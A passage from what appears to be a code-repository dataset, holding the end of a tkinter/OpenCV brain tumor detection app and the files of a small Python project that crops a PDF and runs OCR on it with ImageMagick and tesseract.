,height=2 ,fg=\"black\",font=('times', 10, ' bold ') ) \r\n lbl.place(x=470, y=160)\r\n # Create a canvas that can fit the above image\r\n canvas3 = tkinter.Canvas(window, width = width, height = height)\r\n canvas3.place(x=450,y=200)\r\n \r\n # Use PIL (Pillow) to convert the NumPy ndarray to a PhotoImage\r\n photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(im_th))\r\n \r\n # Add a PhotoImage to the Canvas\r\n canvas3.create_image(0, 0, image=photo, anchor=tkinter.NW)\r\n window.mainloop()\r\ndef detect():\r\n global im_th,mask,cv_img,img,clone_img,canvas3,canvas4\r\n #canvas3.delete(\"all\")\r\n clone_img = copy.copy(img)\r\n #cv2.imshow('median filter1',img)\r\n denoised=cv2.medianBlur(im_th,9)\r\n #cv2.imshow('median filter',denoised)\r\n edges = cv2.Canny(denoised,100,200)\r\n #cv2.imshow('median filter3',edges)\r\n kernel = np.ones((3,3),np.uint8)\r\n opening = cv2.morphologyEx(denoised,cv2.MORPH_OPEN,kernel, iterations = 2)\r\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\r\n # Finding sure foreground area\r\n dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\r\n ret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)\r\n\r\n # Finding unknown region\r\n sure_fg = np.uint8(sure_fg)\r\n unknown = cv2.subtract(sure_bg,sure_fg)\r\n # Marker labelling\r\n ret, markers = cv2.connectedComponents(sure_fg)\r\n # Add one to all labels so that sure background is not 0, but 1\r\n markers = markers+1\r\n # Now, mark the region of unknown with zero\r\n markers[unknown==255] = 0\r\n markers = cv2.watershed(cv_img,markers)\r\n cv_img[markers == -1] = [255,0,0]\r\n #markers[unknown==255] = 0\r\n markers1 = cv2.watershed(clone_img,markers)\r\n clone_img[markers1 == 1] = [0,0,0]\r\n height, width= mask.shape\r\n lbl = tk.Label(window, text=\"Tumor Detection Image\",width=20 ,height=2 ,fg=\"black\",font=('times', 10, ' bold ') ) \r\n lbl.place(x=660, y=160)\r\n # Create a canvas that can fit the above image\r\n canvas4 = tkinter.Canvas(window, width = width, height = height)\r\n canvas4.place(x=650,y=200)\r\n \r\n # Use PIL (Pillow) to convert the NumPy ndarray to a PhotoImage\r\n photo = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(cv_img))\r\n \r\n # Add a PhotoImage to the Canvas\r\n canvas4.create_image(0, 0, image=photo, anchor=tkinter.NW)\r\n window.mainloop()\r\ndef Feature_extraction():\r\n global clone_img,contrast,energy,homogeneity,correlation\r\n im_th=cv2.cvtColor(clone_img, cv2.COLOR_BGR2GRAY)\r\n g = skimage.feature.greycomatrix(im_th, [1], [0], levels=256, symmetric=False, \r\n normed=True)\r\n contrast = skimage.feature.greycoprops(g, 'contrast')[0][0]\r\n energy = skimage.feature.greycoprops(g, 'energy')[0][0]\r\n homogeneity = skimage.feature.greycoprops(g, 'homogeneity')[0][0]\r\n correlation = skimage.feature.greycoprops(g, 'correlation')[0][0]\r\n lbl = tk.Label(window, text=\"CONTRAST:\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 10, ' bold ') ) \r\n lbl.place(x=850, y=200)\r\n lbl = tk.Label(window, text=\"ENERGY:\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 10, ' bold ') ) \r\n lbl.place(x=850, y=230)\r\n lbl = tk.Label(window, text=\"HOMOGENEITY:\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 10, ' bold ') ) \r\n lbl.place(x=850, y=260)\r\n lbl = tk.Label(window, text=\"CORRELATION:\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 10, ' bold ') ) \r\n lbl.place(x=850, y=290)\r\n lbl = tk.Label(window, text=\"FEATURE EXTRACTION\",width=20 ,height=2 ,fg=\"black\" ,font=('times', 15, ' bold ') ) \r\n lbl.place(x=900, y=150)\r\n message = tk.Label(window, text=contrast ,fg=\"red\" ,width=30 ,height=2, activebackground = \"yellow\" ,font=('times', 10, ' bold ')) \r\n message.place(x=1000, y=200)\r\n message = tk.Label(window, text=energy ,fg=\"red\" ,width=30 ,height=2, activebackground = \"yellow\" ,font=('times', 10, ' bold ')) \r\n message.place(x=1000, y=230)\r\n message = tk.Label(window, text=homogeneity ,fg=\"red\" ,width=30 ,height=2, activebackground = \"yellow\" ,font=('times', 10, ' bold ')) \r\n message.place(x=1000, y=260)\r\n message = tk.Label(window, text=correlation ,fg=\"red\" ,width=30 ,height=2, activebackground = \"yellow\" ,font=('times', 10, ' bold ')) \r\n message.place(x=1000, y=290)\r\n print(contrast)\r\n print(energy)\r\n print(homogeneity)\r\n print(correlation)\r\n window.mainloop()\r\ndef Train_data():\r\n datadir = \"F:\\\\2019-2020\\\\BE\\\\Register\\\\2.SGI Brain Tumor Detection Using Machine Learning\\\\Phase6\\\\Brain Toumer\"\r\n Categories = [\"no\",\"yes\"]\r\n j=0\r\n wb = Workbook()\r\n sheet1 = wb.add_sheet('Sheet 1')\r\n lbl = tk.Label(window, text=\"Training\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 13, ' bold ') ) \r\n lbl.place(x=850, y=355)\r\n progress = Progressbar(window, orient = HORIZONTAL, \r\n length = 500, mode = 'determinate',maximum =253) \r\n for category in Categories:\r\n path = os.path.join(datadir,category)\r\n #print(len(os.listdir(path))\r\n for img in os.listdir(path): \r\n #name= filedialog.askopenfilename() \r\n img = cv2.imread(os.path.join(path,img))\r\n dim=(180,218)\r\n img = cv2.resize(img,dim)\r\n img1=img\r\n #print(img.shape[:2])\r\n im_out=np.zeros(img.shape[:2], dtype=\"uint8\") * 255\r\n mask = np.zeros(img.shape[:2], dtype=\"uint8\") * 255\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n height, width= img_gray.shape\r\n ret,im_th= cv2.threshold(img_gray,180,255,cv2.THRESH_BINARY)\r\n #cv2.imshow('image Throshold', im_th)\r\n denoised=cv2.medianBlur(im_th,9)\r\n #cv2.imshow('image Denoised', denoised)\r\n edges = cv2.Canny(denoised,100,200)\r\n #cv2.imshow('Edges',edges)\r\n # noise removal\r\n kernel = np.ones((3,3),np.uint8)\r\n opening = cv2.morphologyEx(denoised,cv2.MORPH_OPEN,kernel, iterations = 2)\r\n\r\n # sure background area\r\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\r\n\r\n # Finding sure foreground area\r\n dist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\r\n ret, sure_fg = cv2.threshold(dist_transform,0.7*dist_transform.max(),255,0)\r\n\r\n # Finding unknown region\r\n sure_fg = np.uint8(sure_fg)\r\n unknown = cv2.subtract(sure_bg,sure_fg)\r\n # Marker labelling\r\n ret, markers = cv2.connectedComponents(sure_fg)\r\n\r\n # Add one to all labels so that sure background is not 0, but 1\r\n markers = markers+1\r\n\r\n # Now, mark the region of unknown with zero\r\n markers[unknown==255] = 0\r\n markers = cv2.watershed(img,markers)\r\n img[markers == 1] = [255,255,255]\r\n img1[markers == 1] = [0]\r\n im_th=cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\r\n #cv2.imshow('image marker',img)\r\n img1 = cv2.bitwise_and(img, img, mask=mask)\r\n g = skimage.feature.greycomatrix(im_th, [1], [0], levels=256, symmetric=False, \r\n normed=True)\r\n contrast = skimage.feature.greycoprops(g, 'contrast')[0][0]\r\n energy = skimage.feature.greycoprops(g, 'energy')[0][0]\r\n homogeneity = skimage.feature.greycoprops(g, 'homogeneity')[0][0]\r\n correlation = skimage.feature.greycoprops(g, 'correlation')[0][0]\r\n sheet1.write(j, 0, contrast) \r\n sheet1.write(j, 1, energy) \r\n sheet1.write(j, 2, homogeneity) \r\n sheet1.write(j, 3, correlation)\r\n print(j)\r\n j=j+1\r\n wb.save('xlwt example.xls')\r\n\r\n \r\n progress['value'] = j\r\n window.update_idletasks() \r\n progress.place(x=850,y=400)\r\n lbl = tk.Label(window, text=\"Training Completed\",width=20 ,height=2 ,fg=\"red\" ,font=('times', 13, ' bold ') ) \r\n lbl.place(x=850, y=355)\r\n #print(pandas.read_excel('xlwt example.xls'))\r\ndef classifier():\r\n global contrast,energy,homogeneity,correlation\r\n df = pd.read_csv(\"xlwt example.csv\")\r\n y=df.out\r\n x=df.drop('out',axis=1)\r\n print(x)\r\n print(y)\r\n x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state = 1)\r\n clf=MLPClassifier()\r\n model=clf.fit(x_train,y_train)\r\n predication=model.predict([[contrast,energy,homogeneity,correlation]])\r\n print(predication)\r\n lbl = tk.Label(window, text=\"Result:\",width=20 ,height=2 ,fg=\"black\" ,font=('times', 13, ' bold ') ) \r\n lbl.place(x=850, y=420)\r\n message = tk.Label(window, text=predication ,fg=\"red\" ,width=30 ,height=2 ,font=('times', 13, ' bold ')) \r\n message.place(x=980, y=420)\r\n\r\ncanvas1 = tkinter.Canvas(window, width = 300, height = 400)\r\ncanvas1.place(x=50,y=200)\r\ncanvas2 = tkinter.Canvas(window, width = 300, height = 400)\r\ncanvas2.place(x=250,y=200)\r\ncanvas3 = tkinter.Canvas(window, width = 300, height = 400)\r\ncanvas3.place(x=450,y=200)\r\ncanvas4 = tkinter.Canvas(window, width = 300, height = 400)\r\ncanvas4.place(x=50,y=200)\r\n\r\nbtn1=Button(text='Load Image', command=answer,width=10 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn1.place(x=50,y=500)\r\nbtn2=Button(text='Rgb2gary', command=rgb2gray,width=10 ,height=2 ,activebackground = \"Green\" ,font=('times', 15, ' bold '))\r\nbtn2.place(x=200,y=500)\r\nbtn3=Button(text='Gray Thr', command=Thresholding,width=10 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn3.place(x=350,y=500)\r\nbtn4=Button(text='find Tumor', command=detect,width=10 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn4.place(x=500,y=500)\r\nbtn5=Button(text='Feature Extraction',command=Feature_extraction,width=15 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn5.place(x=650,y=500)\r\nbtn6=Button(text='Train Dataset',command=Train_data,width=15 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn6.place(x=860,y=500)\r\nbtn7=Button(text='Classifiaction',command=classifier,width=15 ,height=2 ,activebackground = \"Red\" ,font=('times', 15, ' bold '))\r\nbtn7.place(x=1070,y=500)\r\n# Load an image using OpenCV\r\n\r\n" } ]
2
JingwenX/python_ocr_extract_info_from_pdf
https://github.com/JingwenX/python_ocr_extract_info_from_pdf
80b67a7b50064b9ed080d8674f644514636c3965
4f253d58b5fee136548bd41bc8e2d3462e4d18e9
d90547e0d0fd323e183259992fb0d0ef7c8bd9a2
refs/heads/master
2020-03-19T14:25:14.164405
2018-06-08T13:32:05
2018-06-08T13:32:05
136,621,786
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7291169166564941, "alphanum_fraction": 0.7517899870872498, "avg_line_length": 33.91666793823242, "blob_id": "e030780ca58b903c63fadfcb100efcfc6571292a", "content_id": "4ab30ab72371f93b269afcde30424670691e99e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 838, "license_type": "no_license", "max_line_length": 92, "num_lines": 24, "path": "/README.md", "repo_name": "JingwenX/python_ocr_extract_info_from_pdf", "src_encoding": "UTF-8", "text": "# How to use\n1. download this repo.\n2. put your PDF file, named in.pdf, in the same folder.\n3. Specify the \"crop box\" you would like the information to be extracted in \n4. run python2 cropAccountNoFromPDF\n5. Information will be in the output.txt! Yay!\n\n# Dependencies\n## Homebrew manage package:\n1. brew install tesseract\n2. brew install ImageMagick\n## Python Package: PyPDF2\n1. pip install PyPDF2\n\n# Operation: what the program will do\n1. crop PDF (in.pdf) to a small PDF with the size you \n2. convert PDF to tiff\n3. OCR to get the information you need from the tiff\n4. write the OCR output into output.txt\n\n# Future Upgrades (TODO):\n0. before upload, pop up window letting user enter page, media box and crop box number.\n1. pop up a PDF Viewer to let user choose which part (page, media box and crop box) to crop.\n2. upgrade to python3\n" }, { "alpha_fraction": 0.595174252986908, "alphanum_fraction": 0.6152815222740173, "avg_line_length": 29.4489803314209, "blob_id": "a81b1e4fd8767e703bf9684fbd61c223e40711cf", "content_id": "e20a620e4281110bd3e2ef657f13d9d55d426cd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1492, "license_type": "no_license", "max_line_length": 70, "num_lines": 49, "path": "/cropFromPDF.py", "repo_name": "JingwenX/python_ocr_extract_info_from_pdf", "src_encoding": "UTF-8", "text": "from PyPDF2 import PdfFileReader, utils, PdfFileWriter\nfrom StringIO import StringIO\nimport subprocess\nfrom subprocess import call\nimport callCommandTest as cct\n\n\ninput_path = 'in.pdf'\n\ndef decompress_pdf(temp_buffer):\n temp_buffer.seek(0) # Make sure we're at the start of the file.\n\n process = subprocess.Popen(['pdftk.exe',\n '-', # Read from stdin.\n 'output',\n '-', # Write to stdout.\n 'uncompress'],\n stdin=temp_buffer,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n return StringIO(stdout)\n\nwith open(input_path, 'rb') as input_file:\n input_buffer = StringIO(input_file.read())\n\ntry:\n input_pdf = PdfFileReader(input_buffer)\nexcept utils.PdfReadError:\n input_pdf = PdfFileReader(decompress_pdf(input_file))\n\noutput = PdfFileWriter()\n\nnumPages = input_pdf.getNumPages()\nprint \"document has %s pages.\" % numPages\n\n# for i in range(numPages):\npage = input_pdf.getPage(0)\nprint page.mediaBox.getUpperRight_x(), page.mediaBox.getUpperRight_y()\npage.trimBox.lowerLeft = (225, 200)\npage.trimBox.upperRight = (25, 1000)\npage.cropBox.lowerLeft = (350, 100) #x, y\npage.cropBox.upperRight = (800, 140) #go low 140\noutput.addPage(page)\n\nwith open(\"out.pdf\", \"wb\") as out_f:\n output.write(out_f)\ncct.getDigit()\n" }, { "alpha_fraction": 0.7161716222763062, "alphanum_fraction": 0.7227723002433777, "avg_line_length": 22.346153259277344, "blob_id": "ff10834d229b3574a988e5d572a9f10590a53401", "content_id": "59554411ea8c01de3499b53e7b76174ab61c6646", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "no_license", "max_line_length": 101, "num_lines": 26, "path": "/callCommandTest.py", "repo_name": "JingwenX/python_ocr_extract_info_from_pdf", "src_encoding": "UTF-8", "text": "import subprocess\nfrom subprocess import call\n\ndef getDigit():\n\t\n\n\tconvertToImg = 'convert -density 300 out.pdf -depth 8 -strip -background white -alpha off file.tiff'\n\textractDigit = 'tesseract file.tiff output.txt'\n\tp = subprocess.Popen(convertToImg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\tretval = p.wait()\n\t# extractDigit\n\te = subprocess.Popen(extractDigit, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n\n# (output, err) = e.communicate()\n# for line in p.stdout.readlines():\n# print line,\n\n\"\"\"\nAnother Way\n\"\"\"\n\"\"\"\nimport os\ncmd = 'ls -al'\nos.system(cmd)\n\"\"\"" } ]
3